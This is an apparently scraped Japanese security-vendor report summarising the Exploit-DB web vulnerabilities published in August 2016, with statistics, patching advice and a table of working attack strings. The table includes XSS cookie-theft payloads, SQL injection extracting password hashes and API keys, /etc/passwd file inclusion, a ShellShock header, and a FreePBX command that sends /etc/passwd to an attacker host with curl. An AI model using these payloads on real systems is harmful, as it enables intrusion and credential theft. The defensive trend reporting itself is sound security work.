• 検索結果がありません。

サマリー EDB-Report ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 8 月に公開された Exploit-DB の分析結果 Cross Site Scripting の攻撃に対する脆弱性報告件数が最も多かったです 発見された Cross Site

N/A
N/A
Protected

Academic year: 2021

シェア "サマリー EDB-Report ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 8 月に公開された Exploit-DB の分析結果 Cross Site Scripting の攻撃に対する脆弱性報告件数が最も多かったです 発見された Cross Site"

Copied!
8
0
0

読み込み中.... (全文を見る)

全文

(1)
(2)

1. 脆弱性別件数

脆弱性カテゴリ 件数

ファイルアップロード

(File Upload) 1 リモートコマンド実行

(Remote Command Execution) 2 ディレクトリトラバーサル

(Directory Traversal) 2 ローカルファイル挿入

(Local File Inclusion:LFI) 4 コマンド インジェクション

(Command Injection) 5 SQL インジェクション

(SQL Injection) 10 クロスサイトスクリプティング

(Cross Site Scripting : XSS) 12

合計 36 2. 危険度別件数 危険度 件数 割合 早急対応要 3 8% 高 33 92% 合計 36 100% 3. 攻撃実行の難易度別件数 難易度 件数 割合 難 3 6% 中 12 24% 易 32 65% 合計 49 100% 4. 主なソフトウェア別脆弱性発生件数 ソフトウェア名 件数 WSO2 Carbon 7 Nagios Network Analyzer 5

Wordpress 5

Sakai 4

Nagios Incident Manager 2 NUUO NVRmini 2

FreePBX 2

Navis WebAccess 1 Nagios Log Server 1 PHP Power Browse 1 chatNow 1 phpCollab CMS 1 Davolink 1 Subrion CMS 1 Zabbix 1

WebNMS Framework Server 1

サマリー

2016年8月に公開されたExploit-DBの分析結果、Cross Site Scriptingの攻撃に対する脆弱性報告件数が最も多かったです。発見されたCross Site Scriptingらの攻撃は単にスクリプトを使用したり、イメージタグを使用す るなどの攻撃難易度や危険度の側面ではレベルの高い攻撃パターンではありませんでした 。しかし、Cross Site Scriptingの攻撃は、スクリプトおよび特定タグが実行されると、脆弱な部分に実際の多様なコードが挿入ができる攻撃 なので、スクリプトおよびタグなどの実行自体ができないようにしなければなりません。したがって、脆弱性が発見された該当ソフトウェアを使用する管理者はそのスクリプトおよびイメージタグが実行されるかを確認した後、必ずセキュアコー ディングおよびアップデートが必要と考えられます。Cross Site Scripting以外の脆弱性では、Linux Bashの脆弱性としてよく知られているShellShockの脆弱性が発見されました。攻撃パターンは、主にHTTP Headerに入り、 CGIが実行される際、任意の命令語が実行されることができます。2014年に初めて発見されたShellShockの脆弱性は、OpenSSLの脆弱性であるHeartBleed脆弱性よりもっと波及力が大きな脆弱性でしたが、現在はBash Updateを最新に実施して、解決することができます。古いバージョンのLinuxを使用している管理者であればこのようなセキュリティアップデートを実施し、ShellShockと同じ脆弱性に露出されて、規模の大きいセキュリティ事故とつなが らないように注意しなければなりません。 1 2 2 4 5 10 12 0 2 4 6 8 10 12 14

File Upload Remote Command Execution Directory Traversal LFI Command Injection SQL Injection XSS 脆弱性別件数 3 33 危険度別件数 早急対応要 高 3 12 32 攻撃実行の難易度別件数 難 中 易 7 5 5 4 2 2 2 1 1 1 1 1 1 1 1 主なソフトウェア別脆弱性発生件数 WSO2 Carbon Nagios Network Analyzer Wordpress Sakai

Nagios Incident Manager NUUO NVRmini FreePBX Navis WebAccess Nagios Log Server PHP Power Browse chatNow phpCollab CMS Davolink

(3)

日付 EDB番号 脆弱性カテゴリ 攻撃難脆弱性度 危険度 脆弱性名 攻撃コード 対象プログラム 対象環境

2016-08-01 40190 XSS 中 高 Support Plugin 6.2.03 - admin-WordPress WP Live Chat ajax.php XSS 脆弱性

POST /wp-admin/admin-ajax.php HTTP/1.1 Host:

User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 action=wplc_user_send_offline_message&security=8d1f c19e30&cid=1&name=<script>eval(String.fromCharCod e(97, 108, 101, 114, 116, 40, 34, 88, 83, 83, 32, 105, 110, 32, 110, 97, 109, 101, 33, 34, 41, 59));</script>&email=Mail&msg=<script>eval(String.fro mCharCode(97, 108, 101, 114, 116, 40, 34, 88, 83, 83, 32, 105, 110, 32, 109, 115, 103, 33, 34, 41, 59));</script> Wordpress WordPress WP Live Chat Support

Plugin 6.2.03

2016-08-01 40189 SQL Injection 難 早急対応要 WordPress Booking Calendar Plugin 6.2 - SQL Injection POST /wp-admin/admin.php?page=booking%2Fwpdev- booking.phpwpdev-booking&wh_approved&wh_is_new=1&wh_booking_d ate=3&view_mode=vm_listing HTTP/1.1 Host:

User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */*

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

wh_booking_id=3 AND (SELECT 5283 FROM(SELECT COUNT(*),CONCAT(0x7176626271,(SELECT MID((IFNULL(CAST(user_pass AS CHAR),0x20)),1,54) FROM wordpress.wp_users ORDER BY ID LIMIT 0,1),0x717a787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Wordpress WordPress Booking Calendar Plugin 6.2

2016-08-05 40206 XSS 中 高 WordPress Count per Day Plugin3.5.4 - / XSS 脆弱性

GET / HTTP/1.1 Host:

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36 Referer: javascript:c=String.fromCharCode;alert(c(83)+c(117)+c( 109)+c(79)+c(102)+c(80)+c(119)+c(110)+c(46)+c(110) +c(108)) Wordpress WordPress Count per Day Plugin

3.5.4 2016-08-05 40205 XSS 易 高 Davolink DV-2051 - / XSS 脆弱性 /scvrtsrv.cmd?action=add&srvName=FooBar<iframe%2 0onload=alert(0)>&srvAddr=192.168.1.100&proto=1,& eStart=4444,&eEnd=4444,iStart=4444,&iEnd=4444, Davolink Davolink DV-2051

2016-08-05 40204 LFI 易 高 PHP Power Browse 1.2 -browse.php LFI 脆弱性

/browse.php?p=source&file=/etc/passwd PHP Power Browse

PHP Power Browse 1.2

2016-08-05 40202 SQL Injection 易 高 /admin/database/sql/ SQLSubrion CMS 4.0.5 -Injection 脆弱性

POST /admin/database/sql/ HTTP/1.1 Host:

User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */*

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

query=1 and &show_query=1 or 1=1--&exec_query=Go

Subrion CMS Subrion CMS4.0.5

EDB-Report

最新Web脆弱性トレンドレポート(2016.08)

2016.08.01~2016.08.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。

(4)

2016-08-06 40213 Remote Command

Execution 難 早急対応要

NUUO NVRmini 2 3.0.8 - /cgi-bin/cgi_system RCE 脆弱性

POST / HTTP/1.1 Host:

User-Agent: () { :;}; /bin/ls -al Accept: */*

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

cmd=ftp_setup&act=modify&com_port=21&pasv_port_fr om=1024&pasv_port_to=65535&services=enable

NUUO NVRmini NUUO NVRmini 2 3.0.8

2016-08-06 40212 Command Injection 易 高 NUUO NVRmini 2 3.0.8 - /cgi-bin/cgi_system Command Injection 脆弱性

POST /cgi-bin/cgi_system?cmd=saveconfig HTTP/1.1 Host:

User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 bfolder=%2Fmtd%2Fblock3&bfile=|ping%20-n%200%20localhost&inc_emap=no&inc_pos=no

NUUO NVRmini NUUO NVRmini 23.0.8

2016-08-08 40218 SQL Injection 易 高 emailusers.php SQL Injection 脆phpCollab CMS 2.5 -弱性 /phpcollab/users/emailusers.php?id=1%20or%201=1--&&PHPSESSID=ghtu76jt276nji04lua07930t5 phpCollab CMS phpCollab CMS 2.5 2016-08-08 40216 SQL Injection 易 高 Navis WebAccess -showNotice.do SQL Injection 脆 弱性 /express/showNotice.do?report_type=1&GKEY=2 AND 9753=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(10 6)||CHR(118)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (9753=9753) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(107)||CHR(118)||CHR( 113)||CHR(62))) FROM DUAL)

Navis WebAccess Navis WebAcces

2016-08-10 40229 Directory Traversal 易 高 and 5.2 SP1 - /servlets/ DirectoryWebNMS Framework Server 5.2 Traversal 脆弱性

POST

/servlets/FileUploadServlet?fileName=../jsp/Login.jsp HTTP/1.1

Host:

User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 WebNMS Framework Server WebNMS Framework Server 5.2 and 5.2 SP1

2016-08-15 40237 SQL Injection 易 高 Zabbix 2.2.x, 3.0.x - latest.phpSQL Injection 脆弱性 /latest.php?output=ajax&sid=&favobj=toggle&toggle_open_state=1&toggle_ids[]=15385)%3B%20select%20 *%20from%20users%20where%20(1%3D1

Zabbix Zabbix 2.2.x,3.0.x

2016-08-16 40241 XSS 易 高 challenges-mgt.jsp XSS 脆弱性WSO2 Carbon 4.4.5 - /carbon/identity-mgt/challenges-mgt.jsp?addRowId=XSS&setName="/><script>alert(docu ment.cookie)</script>

(5)

日付 EDB番号 脆弱性カテゴリ 攻撃難脆弱性度 危険度 脆弱性名 攻撃コード 対象プログラム 対象環境

EDB-Report

最新Web脆弱性トレンドレポート(2016.08)

2016.08.01~2016.08.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。

2016-08-16 40240 LFI 易 高 downloadgz-ajaxprocessor.jspWSO2 Carbon 4.4.5 -LFI 脆弱性

/carbon/log-view/downloadgz-ajaxprocessor.jsp?logFile=../../repository/conf/registry.x ml&tenantDomain=&serviceName=

WSO2 Carbon WSO2 Carbon 4.4.5

2016-08-16 40252 Command Injection 中 高

Nagios Incident Manager 2.0.0 -/nagiosim/reports/download/ Command Injection 脆弱性 /nagiosim/reports/download/jpg/mttr/c3RhcnRfZGF0ZT0 yMDE2LTA1LTA2JmVuZF9kYXRlPTIwMTYtMDUtMDYmdHl wZXNbXT0yIiIiO3t0b3VjaCwvdG1wL01ZRklMRX07ZWNob w== Nagios Incident Manager Nagios Incident Manager 2.0.0

2016-08-16 40251 SQL Injection 中 高 Nagios Network Analyzer 2.2.0 -/nagiosna/index.php/api/checks / SQL Injection 脆弱性 /nagiosna/index.php/api/checks/read?q%5Blastcode%5 D=0&o%5Bcol%5D=name%20AND%20(SELECT%20* %20FROM%20(SELECT(SLEEP(5)))UtTW)&o%5Bsort% 5D=ASC Nagios Network Analyzer Nagios Network Analyzer 2.2.0

2016-08-16 40250 Command Injection 中 高 Nagios Log Server 1.4.1 -Multiple Vulnerabilities

POST /nagioslogserver/api/check/create/1 HTTP/1.1 Host:

User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 alert={"name"%3a"StduserAlertTest","check_interval"%3a" 1m","lookback_period"%3a"1m","warning"%3a"1","critical" %3a"1","method"%3a{"type"%3a"exec","path"%3a"/bin/to uch", "args"%3a"/tmp/STDUSER"},"alert_crit_only"%3a0,"created _by"%3a"stduser","query_id"%3a"AVTLGmd-GYGKrkWMo5Tc"} Nagios Log Server Nagios Log Server 1.4.1

2016-08-16 40252 SQL Injection 難 早急対応要 Nagios Incident Manager 2.0.0 -/nagiosim/admin/settings SQL Injection 脆弱性

POST /nagiosim/admin/settings HTTP/1.1 Host:

User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */*

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

timezone=Pacific/Samoa' AND (SELECT 5323 FROM(SELECT

COUNT(*),CONCAT(0x717a7a7171,(MID((IFNULL(CAST (DATABASE() AS

CHAR),0x20)),1,54)),0x7170786a71,FLOOR(RAND(0)* 2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '

Nagios Incident Manager

Nagios Incident Manager 2.0.0

2016-08-16 40251 SQL Injection 中 高 Nagios Network Analyzer 2.2.0 -/nagiosna/index.php/api/source s/ SQL Injection 脆弱性 # /nagiosna/index.php/api/sources/read?o%5Bcol%5D=n ame%20AND%20(SELECT%20*%20FROM%20(SELEC T(SLEEP(5)))UtTW)&o%5Bsort%5D=ASC Nagios Network Analyzer Nagios Network Analyzer 2.2.0

(6)

2016-08-16 40251 SQL Injection 中 高 Nagios Network Analyzer 2.2.0 -/nagiosna/index.php/admin/ SQL Injection 脆弱性 #

POST /nagiosna/index.php/admin/globals HTTP/1.1 Host:

User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */*

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

timezone=US/Eastern%' AND (SELECT 4646 FROM(SELECT COUNT(*),CONCAT(0x232323,(SELECT MID((IFNULL(CAST(apikey AS CHAR),0x20)),1,54) FROM nagiosna_users WHERE id=1 LIMIT

0,1),0x232323,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='' Nagios Network Analyzer Nagios Network Analyzer 2.2.0 2016-08-16 40251 Command Injection 中 高

Nagios Network Analyzer 2.2.0 -/nagiosna/index.php/download/r eport/sourcegroup/ Command Injection 脆弱性 /nagiosna/index.php/download/report/sourcegroup/test/ cVtyaWRdPTUmcVtnaWRdPTEiICIiO3t0b3VjaCwvdG1wL1R FU1RGSUxFfTtlY2hvICI= Nagios Network Analyzer Nagios Network Analyzer 2.2.0 2016-08-16 40251 Command Injection 中 高

Nagios Network Analyzer 2.2.0 -/nagiosna/index.php/download/r eport/source/ Command Injection 脆弱性 /nagiosna/index.php/download/report/source/test/cVtya WRdPTUmcVtnaWRdPTEiICIiO3t0b3VjaCwvdG1wL1RFU1R GSUxFfTtlY2hvICI= Nagios Network Analyzer Nagios Network Analyzer 2.2.0

2016-08-16 40241 XSS 易 高 challenges-mgt-finish.jsp XSS 脆WSO2 Carbon 4.4.5 -弱性 # /carbon/identity-mgt/challenges-mgt-finish.jsp?setName=%22%2F%3E%3Cscript%3Ealert %28document.cookie%29%3C%2Fscript%3E&questio n0=&question1=City+where+you+were+born+%3F&set Id1=http%3A%2F%2Fwso2.org%2Fclaims%2Fchallen geQuestion1&question1=City+where+you+were+born+ %3F&question2=Father%27s+middle+name+%3F&setI d2=http%3A%2F%2Fwso2.org%2Fclaims%2Fchalleng eQuestion1&question2=Father%27s+middle+name+% 3F&question3=Name+of+your+first+pet+%3F&setId3= http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQu estion2&question3=Name+of+your+first+pet+%3F&qu estion4=Favorite+sport+%3F&setId4=http%3A%2F%2 Fwso2.org%2Fclaims%2FchallengeQuestion2&question 4=Favorite+sport+%3F&question5=Favorite+food+%3F &setId5=http%3A%2F%2Fwso2.org%2Fclaims%2Fcha llengeQuestion1&question5=Favorite+food+%3F&quest ion6=Favorite+vacation+location+%3F&setId6=http%3 A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion1 &question6=Favorite+vacation+location+%3F&question 7=Model+of+your+first+car+%3F&setId7=http%3A%2 F%2Fwso2.org%2Fclaims%2FchallengeQuestion2&que stion7=Model+of+your+first+car+%3F&question8=Na me+of+the+hospital+where+you+were+born+%3F&set Id8=http%3A%2F%2Fwso2.org%2Fclaims%2Fchallen geQuestion2&question8=Name+of+the+hospital+wher e+you+were+born+%3F&setId9=%22%2F%3E%3Cscr ipt%3Ealert%28document.cookie%29%3C%2Fscript %3E&question9=XSS

WSO2 Carbon WSO2 Carbon4.4.5

2016-08-16 40241 XSS 易 高 webapp_info.jsp XSS 脆弱性WSO2 Carbon 4.4.5

- /carbon/webapp-list/webapp_info.jsp?webappFileName=odata.war&web appState=all&hostName=victim- server&httpPort=9763&defaultHostName=victim-server&webappType=%22/%3E%3Cscript%3Ealert%2 8%27XSS%20hyp3rlinx%20\\n\\n%27%20%2bd ocument.cookie%29%3C/script%3E

WSO2 Carbon WSO2 Carbon4.4.5

2016-08-16 40241 XSS 易 高 WSO2 Carbon 4.4.5 -newdatasource.jsp XSS 脆弱性

/carbon/ndatasource/newdatasource.jsp?dsName=%22o nMouseMove=%22alert%28%27XSS%20by%20hyp3rlinx%

20\\n\\n%27%2bdocument.cookie%29&edit=HELL WSO2 Carbon

WSO2 Carbon 4.4.5

(7)

日付 EDB番号 脆弱性カテゴリ 攻撃難脆弱性度 危険度 脆弱性名 攻撃コード 対象プログラム 対象環境

EDB-Report

最新Web脆弱性トレンドレポート(2016.08)

2016.08.01~2016.08.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。

2016-08-16 40241 XSS 易 高 WSO2 Carbon 4.4.5 - validateconnection-ajaxprocessor.jsp 脆弱性 /carbon/ndatasource/validateconnection-ajaxprocessor.jsp?&dsName=WSO2_CARBON_DB&drive r=com.mysql.jdbc.Driver&url=%22/%3E%3Cscript%3E alert%28666%29%3C/script%3E&username=root&dsT ype=RDBMS&customDsType=RDBMS&dsProviderType= default&dsclassname=undefined&dsclassname=undefin ed&dsproviderProperties=undefined&editMode=false&c hangePassword=true&newPassword=

WSO2 Carbon WSO2 Carbon4.4.5

2016-08-16 40241 XSS 易 高 handlers.jsp XSS 脆弱性WSO2 Carbon 4.4.5 - /carbon/viewflows/handlers.jsp?retainlastbc=true&flow=in&phase=%22/%3E%3Cscript%3Ealert%28docume nt.cookie%29%3C/script%3E

WSO2 Carbon WSO2 Carbon4.4.5

2016-08-22 40288 Directory Traversal 易 高

WordPress 4.5.3 - admin-ajax.php Directory Traversal 脆弱

POST /wp-admin/admin-ajax.php HTTP/1.1 Host:

User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 plugin=../../../../../../../../../../dev/random&action=update-plugin Wordpress WordPress 4.5.3

2016-08-22 40286 File Upload 中 高 Sakai 10.7 - / File Upload 脆弱性

POST /sakai-fck-connector/web/editor/filemanager/browser/default/con nectors/jsp/connector/user/admin/?Command=FileUplo ad&Type=JSP&CurrentFolder=%2Fgroup%2FPortfolioA dmin%2F HTTP/1.1 Host:

Connection: CloseAccept: text/html, application/xhtml+xml, */* Accept-Language: ko-KR

User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)

Content-Type: multipart/form-data; boundary=---7dd10029908f2

---7dd10029908f2 Content-Disposition: form-data; name="file"; filename="test.jsp'-alert(1)-'foo" Content-Type: application/octet-stream test ---7dd10029908f2--Sakai Sakai 10.7 2016-08-22 40286 XSS 易 高 Sakai 10.7 -/portal/tool/~admin-1010/ XSS 脆弱性 /portal/tool/~admin-1010/create_job?_id2:job_name=TEST';alert(2)//&_id2%3A _id10=Data+Warehouse+Update&_id2:_id14=Post&com. sun.faces.VIEW=&_id2=_id2 Sakai Sakai 10.7 2016-08-22 40286 XSS 易 高 /access/basiclti/site/~admin/ XSSSakai 10.7 -脆弱性 /access/basiclti/site/~admin/axxm4j<img src=a

onerror=alert(3)> Sakai Sakai 10.7

(8)

2016-08-22 40286 LFI 易 高 Sakai 10.7 - /portal/tool/ LFI 脆 弱性 /portal/tool/41fec34b-a47c-4aa5-8786- 3873533f44fa/CvnkzU-31z-1QPe7Z2iQOA/../WEB-INF/web.xml Sakai Sakai 10.7 2016-08-23 40293 XSS 易 高 chatNow - login.php XSS 脆弱性 POST /chatNow/login.php/95fb4"><script>alert(45)</script>b 5ca1 HTTP/1.1 Host:

User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */*

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

chatNow chatNow

2016-08-23 40290 LFI 易 高 1.0 - count_of_send.php LFI 脆WordPress Mail Masta Plugin 弱性

/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passw d

Wordpress WordPress MailMasta Plugin 1.

2016-08-29 40296 Remote CommandExecution 中 高 FreePBX 13.0.35 - config.phpRCE 脆弱性

/admin/config.php?display=modules&action=upload&d ownload=0x4148&remotemod=http://127.0.0.1/junk% 26x=$(cat /etc/passwd);curl -d "$x"

http://Attacker_server:8080/0x4148.jnk

FreePBX FreePBX 13.0.35

2016-08-29 40312 SQL Injection 中 高 FreePBX 13.0.35 - config.php SQL Injection 脆弱性

/admin/config.php?display=f4ris"XOR(if(6661=6661,sle

参照

関連したドキュメント

緑の区間の河川改修が大幅に遅れた要因は,1986年に

・今年 1 月より値上げが要請された印刷用紙について、8

M5Stack Gray や Fire には IMU(慣性計測ユニット)が搭載されています。2019 年 8

太湖、金寨等、20 数カ所で窯跡が発見され、いくつかの窯跡の採集品は簡報で発表された ()。2002 年 月

・紫色に対するそれぞれの印象は、F「ミステリアス」が最も多い回答結果になり、両者ともに

原記載や従来報告された幾つかの報告との形態的相違が見つかった。そのうち,腹部節後端にl

特に7月下旬より8月末日迄の約45日間は殆んど降雨

Jayamsakthi Shanmugam, Dr.M.Ponnavaikko “A Solution to Block Cross Site Scripting Vulnerabilities Based on Service Oriented Architecture”, in Proceedings of 6th IEEE